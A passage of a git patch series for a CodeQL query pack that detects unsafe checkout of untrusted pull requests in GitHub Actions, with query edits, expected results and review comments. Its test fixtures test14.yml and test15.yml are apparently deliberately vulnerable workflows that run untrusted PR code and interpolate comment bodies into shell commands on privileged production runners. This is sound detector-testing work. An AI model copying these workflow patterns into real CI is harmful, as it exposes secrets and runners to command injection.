| manual | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | 
manual | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | -| madhead/read-java-properties | * | artifact | output.* | taint | manual | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | -| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | -| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | -| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | -| novuhq/novu | * | input.docker_name | output.image | taint | manual | -| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | -| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | -| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | -| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | -| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | -| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | -| 
shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | -| simonblund/version-reader | * | artifact | output.version | taint | manual | -| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | -| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | -| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | -| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | -calls -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv1 -| JSON_RESPONSE<> "${GITHUB_ENV}"\nls \| grep 
-E "*.(txt\|md)$" >> "${GITHUB_ENV}) | PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV})\nEOF | -| VAR0 | $TITLE | VAR0<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | -| VAR6 | ${ISSUE_BODY3} | VAR6=${ISSUE_BODY3} | -| VAR7 | Hello\nWorld | VAR7<> $GITHUB_ENV + + - name: Test formalities + run: | + source .github/workflows/scripts/ci_helpers.sh + + RET=0 + for commit in $(git rev-list HEAD ^origin/$BRANCH); do + info "=== Checking commit '$commit'" + if git show --format='%P' -s $commit | grep -qF ' '; then + err "Pull request should not include merge commits" + RET=1 + fi + + author="$(git show -s --format=%aN $commit)" + if echo $author | grep -q '\S\+\s\+\S\+'; then + success "Author name ($author) seems ok" + else + err "Author name ($author) need to be your real name 'firstname lastname'" + RET=1 + fi + + subject="$(git show -s --format=%s $commit)" + if echo "$subject" | grep -q -e '^[0-9A-Za-z,+/_\.-]\+: ' -e '^Revert '; then + success "Commit subject line seems ok ($subject)" + else + err "Commit subject line MUST start with ': ' ($subject)" + RET=1 + fi + + body="$(git show -s --format=%b $commit)" + sob="$(git show -s --format='Signed-off-by: %aN <%aE>' $commit)" + if echo "$body" | grep -qF "$sob"; then + success "Signed-off-by match author" + else + err "Signed-off-by is missing or doesn't match author (should be '$sob')" + RET=1 + fi + + if echo "$body" | grep -v "Signed-off-by:"; then + success "A commit message exists" + else + err "Missing commit message. Please describe your changes" + RET=1 + fi + done + + exit $RET diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml new file mode 100644 index 00000000000..c91b68f6b87 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml 
@@ -0,0 +1,12 @@ +name: Test Formalities + +on: + pull_request: + +permissions: + contents: read + +jobs: + build: + name: Test Formalities + uses: TestOrg/TestRepo/.github/workflows/formal.yml@main diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3db6902ad2f..d9cbfe804ae 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,8 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 9f3e500817a..eb9fcc2418a 100644 
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,4 @@ +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 269c1de902b0028873fbb813a90150fc06b9956d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 10:22:18 +0200 Subject: [PATCH 0521/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ec2e82dfe01..b4c388cf615 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.49 +version: 0.1.50 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 70f493e1d64..e5709a52329 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.49 +version: 0.1.50 groups: [actions, queries] suites: codeql-suites extractor: javascript From 53f82d3d6c54a49dbba84e3e47782c6a7a2d54f5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 12:29:35 +0200 Subject: [PATCH 0522/1267] Control Checks in Run/Uses steps also protect Jobs that depend on them --- .../codeql/actions/security/ControlChecks.qll | 14 +- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 30 +- .../CWE-829/.github/workflows/test14.yml | 227 +++++++++++++++ .../CWE-829/.github/workflows/test15.yml | 271 ++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 37 +++ 6 files changed, 571 insertions(+), 16 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 26bee3ca3a6..1a47f4d92d0 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -59,7 +59,15 @@ abstract class ControlCheck extends AstNode { step.getEnclosingJob().getANeededJob().getEnvironment() = this ) or - this.(Step).getAFollowingStep() = step + ( + this instanceof Run or + this instanceof UsesStep + ) and + ( + this.(Step).getAFollowingStep() = step + or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) + ) } abstract predicate protectsCategoryAndEvent(string category, string event); @@ -188,9 +196,7 @@ class AssociationIfCheck extends AssociationCheck instanceof If { ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", - ]) and - normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bMEMBER\\b.*") and - normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bOWNER\\b.*") + ]) } } 
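Review bot: The new disjunct `step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step)` in the first ControlChecks.qll hunk treats a `needs` edge as proof that the check step ran and passed before `step`. A dependent job whose `if:` uses `always()`, `failure()` or `!cancelled()` still runs when the needed job fails, so a failing check in the needed job would not stop the checkout. The hunk puts no condition on the dependent job's `if:`, so such workflows would presumably be reported as protected. Until that is modelled, state the assumption above the disjunct, e.g. `// assumes the dependent job keeps the default success() gate on its needs; if: always()/failure() is not modelled`, and add a fixture for it. The enclosing predicate starts outside the hunk.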
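Review bot: With the `MEMBER`/`OWNER` requirement removed in the second ControlChecks.qll hunk, `AssociationIfCheck` matches any `if:` that merely mentions one of the `author_association` properties, whatever it is compared with. That includes deny-lists such as `author_association != 'NONE'`. It also includes the test14.yml and test15.yml fixtures added by this commit, which read `github.event.pull_request.author_association` in an `issue_comment` workflow; the `pull_request` object is not part of that event payload, so the inequalities are likely always true. Consider keeping some constraint on the compared values, or document the relaxation on the class: `// matches any reference to author_association; compared values and triggering event are not validated`. The characteristic predicate begins outside the hunk.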
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index 499abc047b6..9efd9b036cd 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
@@ -29,8 +29,14 @@ where
 (
 // issue_comment: check for date comparison checks and actor/access control checks
 exists(Event event |
- event.getName() = "issue_comment" and
 event = checkout.getEnclosingJob().getATriggerEvent() and
+ (
+ event.getName() = "issue_comment"
+ or
+ event.getName() = "workflow_call" and
+ checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() =
+ "issue_comment"
+ ) and
 not exists(ControlCheck check, CommentVsHeadDateCheck date_check |
 (
 check instanceof ActorCheck or
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
index 8577218800e..ce138fb0478 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
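Review bot: The `workflow_call` alternative added here inspects only `getACaller().getATriggerEvent()`, so, if `getACaller()` returns direct callers only, a reusable workflow reached through a second reusable workflow from an `issue_comment` trigger is not matched. The same block is repeated in the UntrustedCheckoutHigh.ql hunk of this commit; a shared predicate would keep the two queries from drifting apart. The `or`/`and` mix relies on `and` binding tighter than `or`; wrapping the second alternative as `(event.getName() = "workflow_call" and ... = "issue_comment")` makes the grouping explicit. The `where` clause starts and ends outside the hunk.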
@@ -26,23 +26,31 @@ where inPrivilegedContext(checkout) and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event e | - e.getName() = "issue_comment" and - checkout.getEnclosingJob().getATriggerEvent() = e and - not exists(ControlCheck write_check, CommentVsHeadDateCheck data_check | - (write_check instanceof ActorCheck or write_check instanceof AssociationCheck) and - write_check.dominates(checkout) and - data_check.dominates(checkout) + exists(Event event | + event = checkout.getEnclosingJob().getATriggerEvent() and + ( + event.getName() = "issue_comment" + or + event.getName() = "workflow_call" and + checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = + "issue_comment" + ) and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | + ( + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck + ) and + check.dominates(checkout) and + date_check.dominates(checkout) ) ) or // not issue_comment triggered workflows exists(Event event | not event.getName() = "issue_comment" and - not exists(ControlCheck check | - check - .protects(checkout, checkout.getEnclosingJob().getATriggerEvent(), "untrusted-checkout") - ) + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml new file mode 100644 index 00000000000..6f03a0e966a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml 
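Review bot: The second disjunct still excludes only `event.getName() = "issue_comment"`, so a `workflow_call` event whose caller is triggered by `issue_comment` is now evaluated by both branches. Such a checkout can pass the actor and date test in the first branch and still be reported by the second, unless `check.protects(checkout, event, "untrusted-checkout")` holds for the `workflow_call` event, which the hunk does not show. If the branches are meant to be exclusive, the exclusion should mirror the first branch's trigger condition; otherwise a comment such as `// workflow_call from an issue_comment caller is intentionally checked by both branches` would record the intent. The `where` clause starts outside the hunk.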
@@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo 
"env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." 
+ } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all 
--force diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml new file mode 100644 index 00000000000..0be96a4140e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml 
@@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ 
secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + 
kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit 
pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + 